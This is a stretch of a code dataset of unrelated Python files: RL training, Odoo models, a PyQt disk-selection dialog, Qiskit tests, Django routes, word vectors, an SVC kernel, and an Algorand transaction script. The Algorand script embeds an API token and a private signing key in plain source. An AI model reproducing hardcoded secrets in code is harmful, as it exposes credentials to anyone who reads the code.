continue: \")\r\n    block_map_shape = (4,4,3)\r\n    myagent = agent(observation_shape, action_size,block_map_shape)\r\n    #pdb.set_trace()\r\n    scores = trainAgent(env, myagent)\r\n    '''\r\n    if load == 'y':\r\n        myagent = agent(observation_shape, action_size, block_map_shape,True,0.1)\r\n        #pdb.set_trace()\r\n        scores = testAgent(env,myagent)\r\n    elif load == 'n':\r\n        myagent = agent(observation_shape, action_size,block_map_shape)\r\n        #pdb.set_trace()\r\n        scores = trainAgent(env, myagent)\r\n    else:\r\n        #TODO - how come the 'epsilon value' runs still load a model??\r\n        myagent = agent(observation_shape, action_size, block_map_shape,True,float(load))\r\n        scores = trainAgent(env,myagent)\r\n    '''\r\n    np.savetxt('dqn_botscores',np.array(scores))\r\n    #plt.plot(scores)\r\n    #plt.show()\r\n    return\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","sub_path":"dqn_bot.py","file_name":"dqn_bot.py","file_ext":"py","file_size_in_byte":11694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"539012154","text":"# -*- coding: utf-8 -*-\n#IStandForFreedom\nfrom osv import osv, fields\n\n\nclass archivos(osv.Model):\n    _name = 'document.archivos'\n    _columns = {\n        'archivo_id': fields.integer('Secuencia'),\n        'nom_archivo': fields.char('Nombre de archivo'),\n        'ver_archivo': fields.char('Version', size=10)\n    }\n\n\nclass cuestionarios(osv.Model):\n    _name = 'document.cuestionarios'\n    _description = 'Tabla para registro de cuestionarios'\n    _columns = {\n        'nom_estudio_id': fields.many2one('project.arranques',\n            'Nombre del estudio'),\n        'arch_cuestionario': fields.binary('Subir cuestionario'),\n        'nom_responsable_id': fields.many2one('hr.employee',\n            'Responsable'),\n        'responsable': fields.date('Fecha de solicitud'),\n        'archivo_ids': fields.one2many('document.archivos',\n            'archivo_id', 'Archivos'),\n        'state': fields.selection((('nuevo', 'Nuevo'),\n            ('revisado', 'Revisado'), ('aprobado', 'Aprobado')), 'Estado'),\n    }\n","sub_path":"estadistica_aplicada2/encuestas/cuestionarios.py","file_name":"cuestionarios.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"336905663","text":"#!/usr/bin/env python3\n\n\"\"\"\nLets the user select a disk to format.\n\"\"\"\n\nimport sys\nimport gettext\nimport locale\nimport os\n\nfrom PyQt5 import
QtCore, QtGui, QtWidgets\n\nimport disks\n\n# Translate this application using Qt .ts files without the need for compilation\nimport tstranslator\n# FIXME: Do not import translations from outside of the application bundle\n# which currently is difficult because we have all translations for all applications\n# in the whole repository in the same .ts files\ntstr = tstranslator.TsTranslator(os.path.dirname(__file__) + \"/i18n\", \"\")\ndef tr(input):\n return tstr.tr(input)\n\n\nclass DiskSelectionWidget(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n\n self.user_agreed_to_erase = False\n self.selected_disk = None\n\n self.old_ds = None # The disks we have recognized so far\n self.disk_listwidget = QtWidgets.QListWidget()\n self.disk_listwidget.setIconSize(QtCore.QSize(48, 48))\n self.disk_listwidget.itemSelectionChanged.connect(self.onSelectionChanged)\n disk_vlayout = QtWidgets.QVBoxLayout(self)\n disk_vlayout.addWidget(self.disk_listwidget)\n self.label = QtWidgets.QLabel()\n disk_vlayout.addWidget(self.label)\n self.required_mib_on_disk = 0\n self.periodically_list_disks()\n\n # Add a ButtonBox with an OK button and a Cancel button\n self.button_box = QtWidgets.QDialogButtonBox()\n self.button_box.setStandardButtons(QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel)\n # Cancel button is the default (blue button)\n self.button_box.button(QtWidgets.QDialogButtonBox.Cancel).setDefault(True)\n # button_box.setCenterButtons(True)\n self.button_box.accepted.connect(self.accept)\n self.button_box.rejected.connect(self.reject)\n # Disable the OK button until the user has selected a disk\n self.button_box.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False)\n disk_vlayout.addWidget(self.button_box)\n\n # When user presses escape, close the dialog box\n self.shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Esc\"), self)\n self.shortcut.activated.connect(self.reject)\n\n # When user presses enter, simulate a click on the OK button\n self.shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Return\"), self)\n self.shortcut.activated.connect(self.accept)\n \n # Start a timer to periodically refresh the list of disks\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.periodically_list_disks)\n self.timer.start(1000)\n\n def accept(self):\n if self.user_agreed_to_erase == True:\n self.timer.stop()\n self.close()\n\n def reject(self):\n self.timer.stop()\n self.close()\n\n def periodically_list_disks(self):\n print(\"periodically_list_disks\")\n self.list_disks()\n\n def list_disks(self):\n ds = disks.get_disks()\n # Do not refresh the list of disks if nothing has changed, because it de-selects the selection\n if ds != self.old_ds:\n self.disk_listwidget.clear()\n for d in ds:\n di = disks.get_disk(d)\n available_bytes = int(di.get(\"mediasize\").split(\" \")[0])\n if (available_bytes >= self.required_mib_on_disk) and di.get(\"geomname\").startswith(\"cd\") == False:\n title = \"%s on %s (%s GiB)\" % (di.get(\"descr\"), di.get(\"geomname\"), f\"{(available_bytes // (2 ** 30)):,}\")\n if di.get(\"geomname\").startswith(\"cd\") == True:\n item = QtWidgets.QListWidgetItem(QtGui.QIcon.fromTheme('drive-optical'), title)\n elif di.get(\"geomname\").startswith(\"da\") == True:\n item = QtWidgets.QListWidgetItem(QtGui.QIcon.fromTheme('drive-removable-media'), title)\n else:\n item = QtWidgets.QListWidgetItem(QtGui.QIcon.fromTheme('drive-harddisk'), title)\n item.setFlags(QtCore.Qt.ItemIsSelectable)\n if available_bytes < self.required_mib_on_disk*1024*1024:\n 
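# items for disks smaller than the required size get only the selectable flag (not enabled)\n                    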
item.setFlags(QtCore.Qt.ItemIsSelectable)\n                    self.disk_listwidget.addItem(item)\n            self.old_ds = ds\n\n    def onSelectionChanged(self):\n        result = self.show_warning()\n        button = self.button_box.button(QtWidgets.QDialogButtonBox.Ok)\n        if result != None:\n            print(\"User has agreed to erase the disk %s\" % result)\n            button.setEnabled(True)\n        else:\n            print(\"User has not agreed to erase the disk\")\n            button.setEnabled(False)\n            self.disk_listwidget.clearSelection()\n\n    def show_warning(self):\n        if len(self.disk_listwidget.selectedItems()) != 1:\n            return\n        self.user_agreed_to_erase = False\n        \n        # Make a dialog box to ask the user if they really want to erase the disk\n        dialog = QtWidgets.QMessageBox()\n        dialog.setWindowTitle(tr(\"Warning\"))\n        dialog.setText(tr(\"This will erase all contents of all partitions\\non this disk and format it.\\n\\nContinue?\"))\n        dialog.setIcon(QtWidgets.QMessageBox.Warning)\n        dialog.addButton(QtWidgets.QMessageBox.Yes)\n        dialog.addButton(QtWidgets.QMessageBox.No)\n        dialog.setDefaultButton(QtWidgets.QMessageBox.No)\n        result = dialog.exec_()\n        if result == QtWidgets.QMessageBox.Yes:\n            print(\"User has agreed to erase the disk\")\n            self.user_agreed_to_erase = True\n            self.selected_disk = self.disk_listwidget.selectedItems()[0].text().split(\" \")[-3]\n            return self.selected_disk\n        else:\n            print(\"User has not agreed to erase the disk\")\n            self.disk_listwidget.clearSelection()\n            self.user_agreed_to_erase = False\n            self.selected_disk = None\n            return None\n\nif __name__ == \"__main__\":\n    app = QtWidgets.QApplication(sys.argv)\n    w = DiskSelectionWidget()\n    w.show()\n    # Run the event loop and wait for the user to click the OK button\n    app.exec_()\n    # Print the selected disk to stdout\n    if w.selected_disk != None:\n        print(\"/dev/%s\" % w.selected_disk)\n    else:\n        print(\"No disk selected\")\n        sys.exit(1)\n\n","sub_path":"System/Format Disk.app/Resources/selectdisk.py","file_name":"selectdisk.py","file_ext":"py","file_size_in_byte":6268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"206209859","text":"import use_cases\r\n\r\n\r\nclass DummyPresenter(use_cases.IPresenter):\r\n    def __init__(self, data_to_return):\r\n        self.index = 0\r\n        self.data_to_return = data_to_return\r\n        self.get_user_input_called = 0\r\n        self.print_number_to_find = 0\r\n        self.print_losing_message = 0\r\n\r\n    def get_user_input(self):\r\n        self.get_user_input_called += 1\r\n        try:\r\n            result = self.data_to_return[self.index]\r\n            self.index += 1\r\n            return result\r\n        except TypeError:\r\n            return self.data_to_return\r\n\r\n    def present_number_to_find(self, number):\r\n        self.print_number_to_find += 1\r\n\r\n    def present_losing_message(self, set_number):\r\n        self.print_losing_message += 1\r\n\r\n\r\nclass RandomGenerator(use_cases.IRandomGenerator):\r\n    def __init__(self, datas):\r\n        self.index = -1\r\n        self.datas = datas\r\n\r\n    def generate_int(self):\r\n        self.index += 1\r\n        return self.datas[self.index]\r\n\r\n\r\ndef test_loses_set_one():\r\n    generator = RandomGenerator([1])\r\n    presenter = DummyPresenter(data_to_return=2)\r\n    usecase_play = use_cases.Play(i_presenter=presenter,\r\n                                  i_number_generator=generator)\r\n    usecase_play.run()\r\n    assert usecase_play.response_model == {\"set\": 1}\r\n\r\n\r\ndef test_loses_at_set_2():\r\n    generator = RandomGenerator([1, 2])\r\n    presenter = DummyPresenter(data_to_return=[1, 1, 3])\r\n\r\n    usecase_play = use_cases.Play(i_presenter=presenter,\r\n                                  i_number_generator=generator)\r\n\r\n    usecase_play.run()\r\n    assert usecase_play.response_model == {\"set\": 2}\r\n\r\n\r\ndef
test_loses_at_set_3():\r\n generator = RandomGenerator([1, 2, 3])\r\n presenter = DummyPresenter(data_to_return=[1, 1, 2, 4])\r\n\r\n usecase_play = use_cases.Play(i_presenter=presenter,\r\n i_number_generator=generator)\r\n\r\n usecase_play.run()\r\n assert usecase_play.response_model == {\"set\": 3}\r\n\r\n","sub_path":"test_use_case_game.py","file_name":"test_use_case_game.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233893570","text":"# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2020, 2023.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\" Test Numerical qEOM excited states calculation \"\"\"\n\nfrom __future__ import annotations\n\nimport unittest\nimport warnings\n\nfrom test import QiskitNatureTestCase\nfrom ddt import ddt, named_data\nimport numpy as np\n\nfrom qiskit.algorithms.eigensolvers import NumPyEigensolver\nfrom qiskit.algorithms.minimum_eigensolvers import NumPyMinimumEigensolver\nfrom qiskit.algorithms.optimizers import SLSQP\nfrom qiskit.primitives import Estimator\nfrom qiskit.utils import algorithm_globals\n\nfrom qiskit_nature.units import DistanceUnit\nfrom qiskit_nature.second_q.circuit.library import UCCSD\nfrom qiskit_nature.second_q.transformers import ActiveSpaceTransformer\nfrom qiskit_nature.second_q.drivers import PySCFDriver\nfrom qiskit_nature.second_q.mappers import (\n BravyiKitaevMapper,\n JordanWignerMapper,\n ParityMapper,\n QubitMapper,\n TaperedQubitMapper,\n)\n\nfrom qiskit_nature.second_q.mappers import QubitConverter\nfrom qiskit_nature.second_q.algorithms import (\n GroundStateEigensolver,\n VQEUCCFactory,\n NumPyEigensolverFactory,\n ExcitedStatesEigensolver,\n QEOM,\n)\nimport qiskit_nature.optionals as _optionals\n\n\n@ddt\nclass TestNumericalQEOMESCCalculation(QiskitNatureTestCase):\n \"\"\"Test Numerical qEOM excited states calculation\"\"\"\n\n @unittest.skipIf(not _optionals.HAS_PYSCF, \"pyscf not available.\")\n def setUp(self):\n super().setUp()\n algorithm_globals.random_seed = 8\n self.driver = PySCFDriver(\n atom=\"H .0 .0 .0; H .0 .0 0.75\",\n unit=DistanceUnit.ANGSTROM,\n charge=0,\n spin=0,\n basis=\"sto3g\",\n )\n\n self.reference_energies = [\n -1.8427016,\n -1.8427016 + 0.5943372,\n -1.8427016 + 0.95788352,\n -1.8427016 + 1.5969296,\n ]\n self.mapper = JordanWignerMapper()\n self.qubit_converter = QubitConverter(self.mapper)\n self.electronic_structure_problem = self.driver.run()\n self.num_particles = self.electronic_structure_problem.num_particles\n\n solver = NumPyEigensolver()\n self.ref = solver\n\n def _assert_energies(self, computed, references, *, places=4):\n with self.subTest(\"same number of energies\"):\n self.assertEqual(len(computed), len(references))\n\n with self.subTest(\"ground state\"):\n self.assertAlmostEqual(computed[0], references[0], places=places)\n\n for i in range(1, len(computed)):\n with self.subTest(f\"{i}. 
excited state\"):\n self.assertAlmostEqual(computed[i], references[i], places=places)\n\n def _compute_and_assert_qeom_energies(self, mapper: QubitConverter | QubitMapper):\n estimator = Estimator()\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = VQEUCCFactory(estimator, UCCSD(), SLSQP())\n gsc = GroundStateEigensolver(mapper, solver)\n esc = QEOM(gsc, estimator, \"sd\")\n results = esc.solve(self.electronic_structure_problem)\n self._assert_energies(results.computed_energies, self.reference_energies)\n\n def test_numpy_mes(self):\n \"\"\"Test NumPyMinimumEigenSolver with QEOM\"\"\"\n solver = NumPyMinimumEigensolver()\n gsc = GroundStateEigensolver(self.qubit_converter, solver)\n esc = QEOM(gsc, Estimator(), \"sd\")\n results = esc.solve(self.electronic_structure_problem)\n self._assert_energies(results.computed_energies, self.reference_energies)\n\n @named_data(\n [\"JWM\", QubitConverter(JordanWignerMapper())],\n [\"JWM_Z2\", QubitConverter(JordanWignerMapper(), z2symmetry_reduction=\"auto\")],\n [\"PM\", QubitConverter(ParityMapper())],\n [\"PM_TQR\", QubitConverter(ParityMapper(), two_qubit_reduction=True)],\n [\"PM_Z2\", QubitConverter(ParityMapper(), z2symmetry_reduction=\"auto\")],\n [\n \"PM_TQR_Z2\",\n QubitConverter(ParityMapper(), two_qubit_reduction=True, z2symmetry_reduction=\"auto\"),\n ],\n [\"BKM\", QubitConverter(BravyiKitaevMapper())],\n [\"BKM_Z2\", QubitConverter(BravyiKitaevMapper(), z2symmetry_reduction=\"auto\")],\n )\n def test_solve_with_vqe_mes(self, converter: QubitConverter):\n \"\"\"Test QEOM with VQEUCCFactory and various QubitConverter\"\"\"\n self._compute_and_assert_qeom_energies(converter)\n\n @named_data(\n [\"JWM\", JordanWignerMapper()],\n [\"PM\", ParityMapper()],\n [\"PM_TQR\", ParityMapper(num_particles=(1, 1))],\n )\n def test_solve_with_vqe_mes_mapper(self, mapper: QubitMapper):\n \"\"\"Test QEOM with VQEUCCFactory and various QubitMapper\"\"\"\n self._compute_and_assert_qeom_energies(mapper)\n\n @named_data(\n [\"JW\", lambda n, esp: TaperedQubitMapper(JordanWignerMapper())],\n [\"JW_Z2\", lambda n, esp: esp.get_tapered_mapper(JordanWignerMapper())],\n [\"PM\", lambda n, esp: TaperedQubitMapper(ParityMapper())],\n [\"PM_Z2\", lambda n, esp: esp.get_tapered_mapper(ParityMapper())],\n [\"PM_TQR\", lambda n, esp: TaperedQubitMapper(ParityMapper(n))],\n [\"PM_TQR_Z2\", lambda n, esp: esp.get_tapered_mapper(ParityMapper(n))],\n )\n def test_solve_with_vqe_mes_taperedmapper(self, tapered_mapper_creator):\n \"\"\"Test QEOM with VQEUCCFactory and various QubitMapper\"\"\"\n tapered_mapper = tapered_mapper_creator(\n self.num_particles, self.electronic_structure_problem\n )\n self._compute_and_assert_qeom_energies(tapered_mapper)\n\n def test_numpy_factory(self):\n \"\"\"Test NumPyEigenSolverFactory with ExcitedStatesEigensolver\"\"\"\n\n # pylint: disable=unused-argument\n def filter_criterion(eigenstate, eigenvalue, aux_values):\n return np.isclose(aux_values[\"ParticleNumber\"][0], 2.0)\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = NumPyEigensolverFactory(filter_criterion=filter_criterion)\n esc = ExcitedStatesEigensolver(self.qubit_converter, solver)\n results = esc.solve(self.electronic_structure_problem)\n\n # filter duplicates from list\n computed_energies = [results.computed_energies[0]]\n for comp_energy in results.computed_energies[1:]:\n if not np.isclose(comp_energy, computed_energies[-1]):\n 
computed_energies.append(comp_energy)\n\n self._assert_energies(computed_energies, self.reference_energies)\n\n def test_custom_filter_criterion(self):\n \"\"\"Test NumPyEigenSolverFactory with ExcitedStatesEigensolver + Custom filter criterion\n for doublet states\"\"\"\n\n driver = PySCFDriver(\n atom=\"Be .0 .0 .0; H .0 .0 0.75\",\n unit=DistanceUnit.ANGSTROM,\n charge=0,\n spin=1,\n basis=\"sto3g\",\n )\n\n transformer = ActiveSpaceTransformer((1, 2), 4)\n # We define an ActiveSpaceTransformer to reduce the duration of this test example.\n\n converter = QubitConverter(JordanWignerMapper(), z2symmetry_reduction=\"auto\")\n\n esp = transformer.transform(driver.run())\n\n expected_spin = 0.75 # Doublet states\n expected_num_electrons = 3 # 1 alpha electron + 2 beta electrons\n\n # pylint: disable=unused-argument\n def custom_filter_criterion(eigenstate, eigenvalue, aux_values):\n num_particles_aux = aux_values[\"ParticleNumber\"][0]\n total_angular_momentum_aux = aux_values[\"AngularMomentum\"][0]\n\n return np.isclose(total_angular_momentum_aux, expected_spin) and np.isclose(\n num_particles_aux, expected_num_electrons\n )\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = NumPyEigensolverFactory(filter_criterion=custom_filter_criterion)\n esc = ExcitedStatesEigensolver(converter, solver)\n results = esc.solve(esp)\n\n # filter duplicates from list\n computed_energies = [results.computed_energies[0]]\n for comp_energy in results.computed_energies[1:]:\n if not np.isclose(comp_energy, computed_energies[-1]):\n computed_energies.append(comp_energy)\n\n ref_energies = [\n -2.6362023196223254,\n -2.2971398524128923,\n -2.2020252702733165,\n -2.1044859216523752,\n -1.696132447109807,\n -1.6416831059956618,\n ]\n\n self._assert_energies(computed_energies, ref_energies, places=3)\n\n @unittest.skipIf(not _optionals.HAS_PYSCF, \"pyscf not available.\")\n def test_solver_compatibility_with_mappers(self):\n \"\"\"Test that solvers can use both QubitConverter and QubitMapper\"\"\"\n\n # pylint: disable=unused-argument\n def filter_criterion(eigenstate, eigenvalue, aux_values):\n return np.isclose(aux_values[\"ParticleNumber\"][0], 2.0)\n\n with self.subTest(\"Excited states solver with qubit converter\"):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = NumPyEigensolverFactory(filter_criterion=filter_criterion)\n esc_converter = ExcitedStatesEigensolver(self.qubit_converter, solver)\n results_converter = esc_converter.solve(self.electronic_structure_problem)\n computed_energies_converter = [results_converter.computed_energies[0]]\n # filter duplicates from list\n for comp_energy in results_converter.computed_energies[1:]:\n if not np.isclose(comp_energy, computed_energies_converter[-1]):\n computed_energies_converter.append(comp_energy)\n self._assert_energies(computed_energies_converter, self.reference_energies)\n\n with self.subTest(\"Excited states solver with qubit mapper\"):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = NumPyEigensolverFactory(filter_criterion=filter_criterion)\n esc_mapper = ExcitedStatesEigensolver(self.mapper, solver)\n results_mapper = esc_mapper.solve(self.electronic_structure_problem)\n # filter duplicates from list\n computed_energies_mapper = [results_mapper.computed_energies[0]]\n for comp_energy in results_mapper.computed_energies[1:]:\n if not np.isclose(comp_energy, 
computed_energies_mapper[-1]):\n                    computed_energies_mapper.append(comp_energy)\n            self._assert_energies(computed_energies_mapper, self.reference_energies)\n\n        with self.subTest(\"QEOM with qubit converter\"):\n            estimator = Estimator()\n            with warnings.catch_warnings():\n                warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n                solver = VQEUCCFactory(estimator, UCCSD(), SLSQP())\n            gsc_converter = GroundStateEigensolver(self.qubit_converter, solver)\n            esc_converter = QEOM(gsc_converter, estimator, \"sd\")\n            results_converter = esc_converter.solve(self.electronic_structure_problem)\n            # filter duplicates from list\n            computed_energies_converter = [results_converter.computed_energies[0]]\n            for comp_energy in results_converter.computed_energies[1:]:\n                if not np.isclose(comp_energy, computed_energies_converter[-1]):\n                    computed_energies_converter.append(comp_energy)\n            self._assert_energies(computed_energies_converter, self.reference_energies)\n\n        with self.subTest(\"QEOM with qubit mapper\"):\n            estimator = Estimator()\n            with warnings.catch_warnings():\n                warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n                solver = VQEUCCFactory(estimator, UCCSD(), SLSQP())\n            gsc_mapper = GroundStateEigensolver(self.mapper, solver)\n            esc_mapper = QEOM(gsc_mapper, estimator, \"sd\")\n            results_mapper = esc_mapper.solve(self.electronic_structure_problem)\n            # filter duplicates from list\n            computed_energies_mapper = [results_mapper.computed_energies[0]]\n            for comp_energy in results_mapper.computed_energies[1:]:\n                if not np.isclose(comp_energy, computed_energies_mapper[-1]):\n                    computed_energies_mapper.append(comp_energy)\n            self._assert_energies(computed_energies_mapper, self.reference_energies)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"test/second_q/algorithms/excited_state_solvers/test_excited_states_solvers.py","file_name":"test_excited_states_solvers.py","file_ext":"py","file_size_in_byte":13018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"77139685","text":"from django.conf.urls import url\nfrom snippets import views, user_views, api_views\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\n# urlpatterns = [\n#\n#\n#\n# ]\n\nurlpatterns = [\n\n    url(r'^$', api_views.api_root),\n\n    url(r'^api/v1/user/$', user_views.UserListView.as_view(), name='user-list'),\n    url(r'^api/v1/user/detail/(?P<pk>[1-9]+)/$', user_views.UserDetailView.as_view(), name='user-detail'),\n\n    # 1.\n    # url(r'^api/v1/list/$', views.snippet_list, name='snippet-list'),\n    # url(r'^api/v1/detail/(?P<pk>[1-9]+)/$', views.snippet_detail, name='snippet-detail'),\n\n    # 2.\n    url(r'^api/v1/list/$', views.snippet_list1, name='snippet-list'),\n    url(r'^api/v1/detail/(?P<pk>[1-9]+)/$', views.snippet_detail1, name='snippet-detail'),\n\n    # 3.\n    # url(r'^api/v1/list/$', views.SnippetsListCreateView.as_view(), name='snippet-list'),\n    # url(r'^api/v1/detail/(?P<pk>[1-9]+)/$', views.SnippetsDetailView.as_view(), name='snippet-detail'),\n\n    # 4.\n    # url(r'^api/v1/list/$', views.SnippetsListView1.as_view(), name='snippet-list'),\n    # url(r'^api/v1/detail/(?P<pk>[1-9]+)/$', views.SnippetsDetailView1.as_view(), name='snippet-detail'),\n\n    url(r'^api/v1/snippets/(?P<pk>[1-9]+)/highlight/$', views.SnippetsHighlightView.as_view(), name='snippet-highlight'),\n\n    # 5.\n    # url(r'^api/v1/list/$', views.SnippetsListView2.as_view(), name='snippet-list'),\n    # url(r'^api/v1/detail/(?P<pk>[1-9]+)/$', views.SnippetsDetailView2.as_view(), name='snippet-detail'),\n\n]\n\n# Route suffix configuration\nurlpatterns = 
format_suffix_patterns(urlpatterns)","sub_path":"snippets/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640448588","text":"import numpy as np\nimport argparse\nimport random\n\nclass ChineseWordVector(object):\n    def __init__(self, vector_file, topn = 10000):\n        self.vector_file = vector_file\n        self.topn = topn\n        self.vector_matrix, self.index2word, self.word2index = self.get_vector_matrix()\n\n    def get_vector_matrix(self):\n        vectors, iw, wi, dim = self.read_vectors()\n        # Turn vectors into numpy format and normalize them\n        matrix = np.zeros(shape=(len(iw), dim), dtype=np.float32)\n        for i, word in enumerate(iw):\n            matrix[i, :] = vectors[word]\n        matrix = self.normalize(matrix)\n        return matrix, iw, wi\n\n    def read_vectors(self): # read top n word vectors, i.e. top is 10000\n        lines_num, dim = 0, 0\n        vectors = {}\n        iw = []\n        wi = {}\n        with open(self.vector_file, encoding='utf-8', errors='ignore') as f:\n            first_line = True\n            for line in f:\n                if first_line:\n                    first_line = False\n                    dim = int(line.rstrip().split()[1])\n                    continue\n                lines_num += 1\n                tokens = line.rstrip().split(' ')\n                vectors[tokens[0]] = np.asarray([float(x) for x in tokens[1:]])\n                iw.append(tokens[0])\n                if self.topn != 0 and lines_num >= self.topn:\n                    break\n        for i, w in enumerate(iw):\n            wi[w] = i\n        return vectors, iw, wi, dim\n\n    def normalize(self, matrix):\n        # L2-normalize each row vector\n        norm = np.sqrt(np.sum(matrix * matrix, axis=1))\n        matrix = matrix / norm[:, np.newaxis]\n        return matrix\n\n    def get_similarity_matrix(self, word):\n        if word in self.word2index:\n            return self.vector_matrix[self.word2index[word]]","sub_path":"brain/word_vectors_Chinese_Word_Vectors.py","file_name":"word_vectors_Chinese_Word_Vectors.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"449697822","text":"\nfrom sklearn.svm import SVC\nimport numpy as np\n\nclass CustomSVC:\n\tdef gaussian_matrix(self, x1, x2, sigma=0.1):\n\t\t# Gaussian (RBF) kernel matrix: exp(-||a - b||^2 / (2 * sigma^2))\n\t\tgram_matrix = np.zeros((x1.shape[0], x2.shape[0]))\n\t\tfor (i, a) in enumerate(x1):\n\t\t\tfor (j, b) in enumerate(x2):\n\t\t\t\ta = a.flatten()\n\t\t\t\tb = b.flatten()\n\t\t\t\tgram_matrix[i, j] = np.exp(-np.sum((a - b) ** 2) / float(2 * (sigma ** 2)))\n\t\treturn gram_matrix\n\n\tdef build(self, x, y):\n\t\tmodel = SVC(C=0.1, kernel=\"precomputed\")\n\t\tmodel.fit(self.gaussian_matrix(x, x), y)\n\t\treturn model\n\n\tdef predict(self, model, trainX, testX):\n\t\treturn model.predict(self.gaussian_matrix(testX, trainX))\n\n\n\n","sub_path":"Face Recognition with SVC and MLP/svc/customsvc.py","file_name":"customsvc.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"218866439","text":"from collections import OrderedDict\n\nfrom algosdk import algod, constants, encoding\nfrom algosdk.transaction import Transaction\n\n\nclass MessageTransaction(Transaction):\n    def __init__(self, sender, receiver, fee, first, last, gen, gh, note, flat_fee=False):\n        Transaction.__init__(self, sender, fee, first, last, note, gen, gh,\n                             None, constants.payment_txn)\n        self.receiver = receiver\n        if flat_fee:\n            self.fee = max(constants.min_txn_fee, self.fee)\n        else:\n            self.fee = max(self.estimate_size() * self.fee,\n                           constants.min_txn_fee)\n\n    def dictify(self):\n        d = dict()\n        d[\"rcv\"] = encoding.decode_address(self.receiver)\n\n        d.update(super(MessageTransaction, self).dictify())\n        od = 
OrderedDict(sorted(d.items()))\n\n return od\n\n @staticmethod\n def _undictify(d):\n args = {\n \"receiver\": encoding.encode_address(d[\"rcv\"])\n }\n return args\n\n\nalgod_token = \"7ae5d632c33fe9d30b22e459d4b3b883b6c9e359cc6686111acb91224c211f76\"\nalgod_address = \"http://localhost:35111\"\n\n# create an algod client\nacl = algod.AlgodClient(algod_token, algod_address)\n\n# get suggested parameters\nparams = acl.suggested_params()\ngen = params[\"genesisID\"]\ngh = params[\"genesishashb64\"]\nlast_round = params[\"lastRound\"]\nfee = params[\"fee\"]\n\nsender = \"RLVMMCZHDCKVGBBAHJPALUY7VNTCDJRZ2P3Y73FCE45Q2KHKEFQZ6Q3VW4\"\nreceiver = \"TIT4WWEEDXBXD4ILJUPECEUCYJ34JK6PFT2ZS6AXWRF3XBWSUCNOUQYW44\"\nsk = \"Vfo4VpjmwtPFry+bowu/VNv/iVHXucJRiQ/D/KRV/6KK6sYLJxiVUwQgOl4F0x+rZiGmOdP3j+yiJzsNKOohYQ==\"\n\n# create a transaction\nmessage = bytes(\"Hello, world!\", \"utf-8\")\ntxn = MessageTransaction(sender, receiver, fee, last_round, last_round + 100, gen, gh, message)\n\n# sign it\nstx = txn.sign(sk)\n\n# send it\ntxid = acl.send_transaction(stx)\n","sub_path":"examples/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"583103429","text":"# coding=utf-8\n# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (nested_scopes, generators, division, absolute_import, with_statement,\n print_function, unicode_literals)\n\nfrom collections import defaultdict\nfrom hashlib import sha1\nimport os\nimport re\nimport subprocess\n\nfrom twitter.common import log\nfrom twitter.common.collections import OrderedDict, OrderedSet, maybe_list\n\nfrom pants.backend.codegen.targets.java_protobuf_library import JavaProtobufLibrary\nfrom pants.backend.codegen.tasks.code_gen import CodeGen\nfrom pants.backend.jvm.targets.jar_library import JarLibrary\nfrom pants.backend.jvm.targets.java_library import JavaLibrary\nfrom pants.backend.python.targets.python_library import PythonLibrary\nfrom pants.base.address import SyntheticAddress\nfrom pants.base.address_lookup_error import AddressLookupError\nfrom pants.base.build_environment import get_buildroot\nfrom pants.base.exceptions import TaskError\nfrom pants.base.target import Target\nfrom pants.binary_util import BinaryUtil\nfrom pants.fs.archive import ZIP\nfrom pants.util.dirutil import safe_mkdir\n\n# Override with protobuf-gen -> supportdir\n_PROTOBUF_GEN_SUPPORTDIR_DEFAULT='bin/protobuf'\n\n# Override with protobuf-gen -> version\n_PROTOBUF_VERSION_DEFAULT='2.4.1'\n\n# Override with protobuf-gen -> javadeps (Accepts a list)\n_PROTOBUF_GEN_JAVADEPS_DEFAULT='3rdparty:protobuf-{version}'\n\n# Override with in protobuf-gen -> pythondeps (Accepts a list)\n_PROTOBUF_GEN_PYTHONDEPS_DEFAULT = []\n\nclass 